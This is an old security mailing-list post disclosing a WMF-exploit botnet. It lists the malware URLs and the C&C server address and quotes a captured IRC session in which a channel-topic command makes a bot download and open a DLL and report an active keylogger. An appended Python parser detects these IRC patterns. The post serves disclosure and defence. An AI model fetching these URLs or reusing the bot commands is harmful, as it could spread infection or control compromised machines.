Message-ID: <BAY20-F19A7051E0DF3C6EDAA47B1F81F0@phx.gbl>
Date: Fri Jan 20 06:35:53 2006
From: pablo_esterban at hotmail.com (Pablo Esterban)
Subject: Possible large botnet
Seems to be a botnet forming with the help of exploiting the recent WMF flaw
on the following site. AFAIK malware/adware is referencing this.
************D O N O T C L I C K************
http://213.17.233.194/mediabar.wmf
http://213.17.233.194/stat_s3.php
http://213.17.233.194/stat.html
************D O N O T C L I C K************
This injects a trojan connecting to 219.240.142.59 on port 44234
44234/tcp open irc Unreal ircd
47292/tcp open irc Unreal ircd
47296/tcp open irc Unreal ircd
54729/tcp open irc-proxy psyBNC 2.3.1
Channel stats list around 500 bots and around 1200 connected (may or may not
be accurate); however, if you poke around you will find
http://219.240.142.59/usage/, containing some interesting links and info
about when this most likely started.
The TCP stream below demos the login and the calling of
http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k
hits on this particular file(!).
NICK *****
USER plnaehe 0 0 :*****
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com NOTICE AUTH :*** Found your hostname
:irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network *****
:irc.foonet.com 002 *****:Your host is irc.foonet.com, running version
Unreal3.2.3
:irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 at
17:25:57 KST
:irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10
MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307
AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server
:irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+
CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet
CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS INVEX
CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.foonet.com 251 *****:There are 1 users and 1194 invisible on 1 servers
:irc.foonet.com 252 *****1 :operator(s) online
:irc.foonet.com 253 *****201 :unknown connection(s)
:irc.foonet.com 254 *****10 :channels formed
:irc.foonet.com 255 *****:I have 1195 clients and 0 servers
:irc.foonet.com 265 *****:Current Local Users: 1195 Max: 5529
:irc.foonet.com 266 *****:Current Global Users: 1195 Max: 1276
:irc.foonet.com 422 *****:MOTD File is missing
*****MODE *****:+iwTxd
USERHOST *****
:irc.foonet.com 302 *****:*****
MODE *****-x+B
JOIN #mrbean5 rowan
PRIVMSG *****:[KEYLOG]: Key logger active.
USERHOST *****
MODE *****-x+B
JOIN #mrbean5 rowan
USERHOST *****
MODE *****-x+B
JOIN #mrbean5 rowan
:irc.foonet.com NOTICE *****:BOTMOTD File not found
*****MODE *****:-x+B
***** JOIN :#mrbean5
:irc.foonet.com 332 *****#mrbean5 :.wipe
http://219.240.142.59/ppp/mediax.dll mediax.dll 3
:irc.foonet.com 333 *****#mrbean5 DDDI 1137401387
:irc.foonet.com 353 *****@ #mrbean5 *****
:irc.foonet.com 366 *****#mrbean5 :End of /NAMES list.
*****PRIVMSG *****:[KEYLOG]: Key logger active.
:irc.foonet.com 302 *****
:irc.foonet.com 302 *****
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL:
http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
PRIVMSG #mrbean5 :[DOWNLOAD]: Opened:
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
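The stream above shows the three things a defender can key on in IRC-borne C&C of this kind: a keyed JOIN, a channel topic (numeric 332) that is itself a bot command carrying a download URL, and PRIVMSG status reports with a bracketed tag such as [KEYLOG] or [DOWNLOAD]. The following is an added example, not code from the poster or from the malware, of a small IRC line parser with detection logic over a constructed sample modelled on the traffic shown; the nick `bot123` and the parser/function names are assumptions.

```python
import re

# Constructed sample modelled on the traffic in the post (nick is invented;
# channel, status tags and URL follow the captured stream).
SAMPLE_STREAM = """\
:irc.foonet.com 001 bot123 :Welcome to the ROXnet IRC Network bot123
JOIN #mrbean5 rowan
:irc.foonet.com 332 bot123 #mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3
PRIVMSG bot123 :[KEYLOG]: Key logger active.
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
PRIVMSG #chat :hello everyone
"""

# RFC 1459 shape: optional ":prefix", then command, then parameters.
IRC_LINE = re.compile(r'^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$')
STATUS_TAG = re.compile(r'^\[(?P<tag>[A-Z]+)\]:')

def parse_irc(line: str):
    """Split a raw IRC line into (prefix, command, params list, trailing text)."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    params, trailing = m.group("params") or "", None
    if " :" in params:                      # trailing parameter after " :"
        params, trailing = params.split(" :", 1)
    elif params.startswith(":"):            # trailing is the only parameter
        params, trailing = "", params[1:]
    return m.group("prefix"), m.group("cmd"), params.split(), trailing

def find_bot_indicators(stream: str):
    """Return (line_no, reason) for lines showing the C&C behaviour seen in the post:
    a keyed JOIN, a 332 topic that starts with a dot-command and carries a URL,
    and PRIVMSGs that report status with a bracketed uppercase tag."""
    findings = []
    for n, line in enumerate(stream.splitlines(), 1):
        parsed = parse_irc(line)
        if not parsed:
            continue
        _, cmd, params, trailing = parsed
        if cmd == "JOIN" and len(params) >= 2:
            findings.append((n, f"keyed join to {params[0]}"))
        elif cmd == "332" and trailing and trailing.startswith(".") and "http" in trailing:
            findings.append((n, f"command-with-URL in topic of {params[-1]}"))
        elif cmd == "PRIVMSG" and trailing and STATUS_TAG.match(trailing):
            findings.append((n, f"status report tag {STATUS_TAG.match(trailing)['tag']}"))
    return findings

if __name__ == "__main__":
    for lineno, reason in find_bot_indicators(SAMPLE_STREAM):
        print(f"line {lineno}: {reason}")
```

Run over a real capture, the same three checks would flag the bot's own JOIN, the .wipe topic and the [KEYLOG]/[DOWNLOAD] reports while leaving ordinary chat (the last sample line) alone.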